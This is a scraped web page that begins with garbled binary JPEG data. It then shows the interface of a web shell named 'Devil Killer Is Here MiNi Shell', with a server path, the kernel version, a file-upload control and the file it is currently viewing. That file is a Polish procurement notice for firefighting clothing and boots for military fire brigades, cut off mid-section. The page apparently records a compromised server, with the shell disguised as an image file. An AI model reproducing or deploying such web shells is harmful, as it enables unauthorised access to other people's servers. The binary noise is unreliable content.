JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240802/0044238401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup ubrań strażackich i obuwia strażackiego na zaopatrzenie Wojskowych Straży Pożarnych w obszarze działania SZI </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Stołeczny Zarząd Infrastruktury</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">SZI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013058050</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Jerozolimskie 97</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-909</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">szp.szi@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szi.ron.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka Organizacyjna MON </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup ubrań strażackich i obuwia strażackiego na zaopatrzenie Wojskowych Straży Pożarnych w obszarze działania SZI </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2200ce06-0ce8-4527-89c1-ae74e791c16b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00442384</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00243812/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Zakup ubrań strażackich i obuwia strażackiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/szi <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/szi</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Ofertę, oświadczenia, o których<br/>mowa w art. 125 ust. 1 ustawy PZP, podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w art. 117 ust. 4 ustawy<br/>PZP, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy PZP, przedmiotowe środki<br/>dowodowe, pełnomocnictwo, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na<br/>podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U. z<br/>2023 r. poz. 57).<br/>2. Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy https://portal.smartpzp.pl/szi,w miejscu<br/>ogłoszenia postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 <br/>z 04.05.2016, str. 1), dalej „RODO”, informuje że: <br/>	administratorem Pani/Pana danych osobowych jest Stołeczny Zarząd Infrastruktury <br/>Al. Jerozolimskie 97, 00-909 Warszawa;<br/>	inspektorem ochrony danych osobowych w Stołecznym Zarządzie Infrastruktury jest Pani Małgorzata Szostak tel. 261-849-386;<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b, c RODO <br/>w celu związanym z zamówieniem publicznym/realizacją umowy tj. w postępowaniu prowadzonym w trybie podstawowym z możliwością negocjacji na zakup ubrań strażackich i obuwia strażackiego na zaopatrzenie Wojskowych Straży Pożarnych w obszarze działania SZI – Sprawa 48/2024;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 i 2 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. 2023 poz. 1605), dalej „ustawa PZP”;<br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 i 79 ustawy PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych jednakże skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa <br/>w art. 18 ust. 2 RODO. Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub <br/>z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego;<br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">48/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 341463,41 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 - ubrania strażackie - opis przedmiotu zamówienia załącznik nr 13a do SWZ </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 276422,76 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">18100000-0 - Odzież branżowa, specjalna odzież robocza i dodatki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Maksymalna wartość opcji wynosi 276422,76 zł netto.<br/>Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji, o którym mowa w art. 441 ust. 1 ustawy Pzp, dla<br/>Części 1 oraz dla Części 2 niniejszego postępowania do dnia 06.12.2024 r.<br/>Prawo opcji realizowane będzie na takich samych warunkach i w takich samych terminach jak zamówienie podstawowe.<br/>Cena jednostkowa asortymentu z zamówienia podstawowego oraz takiego samego asortymentu objętego prawem opcji<br/>będzie identyczna. W przypadku rozbieżności cen jednostkowych asortymentu z zamówienia podstawowego oraz takiego<br/>samego asortymentu objętego prawem opcji, Zamawiający uzna za prawidłową cenę jednostkową asortymentu z<br/>zamówienia podstawowego, po uprzednim zawiadomieniu Wykonawcy na podstawie art. 223 ust. 2 pkt. 3 ustawy PZP.<br/>Zamawiający zastrzega sobie prawo niewykorzystania całości lub części zamówienia objętego prawem opcji w dowolnej<br/>ilości, a Wykonawca oświadcza, iż nie będzie z tego tytułu wnosił żadnych roszczeń.<br/>Zakres opcji określa Załącznik nr 8a do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie PZP oraz SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria<br/>wyboru :<br/>•	Cena oferty brutto – 60,00 % <br/>•	Termin wykonania dostawy – 40,00 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 - obuwie strażackie - szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 13b do SWZ </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 65040,65 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">18832000-0 - Obuwie specjalne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Maksymalna wartość opcji wynosi 48780,49 zł netto.<br/>Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji, o którym mowa w art. 441 ust. 1 ustawy Pzp, dla<br/>Części 1 oraz dla Części 2 niniejszego postępowania do dnia 13.12.2024 r.<br/>Prawo opcji realizowane będzie na takich samych warunkach i w takich samych terminach jak zamówienie podstawowe.<br/>Cena jednostkowa asortymentu z zamówienia podstawowego oraz takiego samego asortymentu objętego prawem opcji<br/>będzie identyczna. W przypadku rozbieżności cen jednostkowych asortymentu z zamówienia podstawowego oraz takiego<br/>samego asortymentu objętego prawem opcji, Zamawiający uzna za prawidłową cenę jednostkową asortymentu z<br/>zamówienia podstawowego, po uprzednim zawiadomieniu Wykonawcy na podstawie art. 223 ust. 2 pkt. 3 ustawy PZP.<br/>Zamawiający zastrzega sobie prawo niewykorzystania całości lub części zamówienia objętego prawem opcji w dowolnej<br/>ilości, a Wykonawca oświadcza, iż nie będzie z tego tytułu wnosił żadnych roszczeń.<br/>Zakres opcji określa Załącznik nr 8b do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie PZP oraz SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria<br/>wyboru :<br/>•	Cena oferty brutto – 60,00 % <br/>•	Termin wykonania dostawy – 40,00 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 5.1	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa warunku w niniejszym postępowaniu. <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie określa warunku w niniejszym postępowaniu.<br/><br/>3)	sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie określa warunku w niniejszym postępowaniu.<br/>4)	zdolności technicznej lub zawodowej: <br/>a)	Zamawiający żąda złożenia wykazu dostaw wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, z informacją <br/>o wykonaniu: <br/>•	dla Części 1 - minimum jednego zamówienia polegającego na dostawie ubrań strażackich o wartości co najmniej 130 000,00 zł brutto (każda),<br/>•	dla Części 2 - minimum jednego zamówienia polegającego na dostawie obuwia strażackiego o wartości co najmniej 30 000,00 zł brutto (każda),<br/>W przypadku podania kwot w walucie obcej, Zamawiający dokona przeliczenia tej wartości na wartość w złotych według średniego kursu NBP dla danej waluty z dnia zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu zamieszczenia ogłoszenia <br/>o zamówieniu, NBP nie opublikuje informacji o średnim kursie walut, Zamawiający dokona odpowiednich przeliczeń wg średniego kursu <br/>z pierwszego kolejnego dnia, w którym NBP opublikuje ww. informacje.<br/>5.2 W celu potwierdzenia, że oferowane dostawy odpowiadają określonym wymaganiom, Zamawiający żąda złożenia nw. dokumentów:<br/>1)	Ważne Świadectwa dopuszczenia dla: <br/>a)	Część 1 – Świadectwo dopuszczenia do użytkowania wydane przez CNBOP potwierdzające spełnienie normy PN-EN 469 dla ubrania specjalnego dla pozycji wyszczególnionych w Formularzu cenowym – pozycja 1,<br/>b)	Część 1 – Świadectwo dopuszczenia do użytkowania wydane przez CNBOP potwierdzające spełnienie normy PN-EN 15614 dla ubrania specjalnego lekkiego dla pozycji wyszczególnionych w Formularzu cenowym – pozycja 2<br/>c)	Część 1 – Świadectwo dopuszczenia wydane przez CNBOP dla pozycji wyszczególnionych w Formularzu cenowym – pozycja 3<br/>d)	Część 1 – Świadectwo dopuszczenia wydane przez CNBOP dla pozycji wyszczególnionych w Formularzu cenowym – pozycja 4<br/>e)	Część 1 – Świadectwo dopuszczenia wydane przez CNBOP dla pozycji wyszczególnionych w Formularzu cenowym – pozycja 5<br/>f)	Część 2 – Świadectwo dopuszczenia do użytkowania wydane przez CNBOP dla pozycji wyszczególnionych w Formularzu cenowym – pozycja 1<br/>g)	Część 2 – Świadectwo dopuszczenia do użytkowania wydane przez CNBOP dla pozycji wyszczególnionych w Formularzu cenowym – pozycja 2<br/>2)	Certyfikaty:<br/>a)	Część 1 – Certyfikat oceny typu WE dla pozycji wyszczególnionych w Formularzu cenowym – pozycja 1<br/>b)	Część 1 – Certyfikat oceny typu WE dla pozycji wyszczególnionych w Formularzu cenowym – pozycja 3<br/>c)	Część 2 – Certyfikat oceny typu WE dla pozycji wyszczególnionych w Formularzu cenowym – pozycja 1<br/>d)	Część 2 – Certyfikat oceny typu WE dla pozycji wyszczególnionych w Formularzu cenowym – pozycja 2<br/>3)	Oświadczenia dotyczące uczestnictwa w systemie GS-1 (Załącznik nr 11 do SWZ).<br/>5.3	Zgodnie z treścią art. 116 ust. 2 ustawy PZP, oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>5.4	Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą „spełnia – nie spełnia” w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w Rozdziale II-V niniejszej Specyfikacji Warunków Zamówienia. Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">: 1.<br/>Zgodnie z art. 274 ust. 1 ustawy PZP Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych<br/>środków dowodowych:<br/>1) wykazu dostaw wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, 